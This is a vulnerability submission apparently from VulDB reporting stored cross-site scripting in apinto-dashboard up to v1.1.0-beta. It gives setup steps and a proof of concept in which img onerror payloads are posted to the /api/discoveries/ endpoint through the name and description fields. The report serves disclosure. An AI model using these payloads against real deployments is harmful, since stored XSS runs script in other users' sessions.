Submeter #50340: apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-betainformação

Títuloapinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta
Descriçãorepo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` This problem exists in most pages with tables. For example, on the/discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description Then click Details to trigger. Request URL: /api/discoveries/ Request Method: POST PostData: {"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"} ![XroR8.png](https://c2.im5i.com/2022/11/01/XroR8.png) ![Xr9Zz.png](https://c2.im5i.com/2022/11/01/Xr9Zz.png) ![Xr3pU.png](https://c2.im5i.com/2022/11/01/Xr3pU.png) ![XrZPw.png](https://c2.im5i.com/2022/11/01/XrZPw.png) Reported by Neppah(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01.
Utilizador
 Tomy (UID 34751)
Submissão01/11/2022 12h09 (há 4 anos)
Moderação01/11/2022 16h47 (5 hours later)
EstadoAceite
Entrada VulDB212639 [eolinker apinto-dashboard /api/discoveries/ Script de Site Cruzado]
Pontos17

VoltarVisão GeralPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!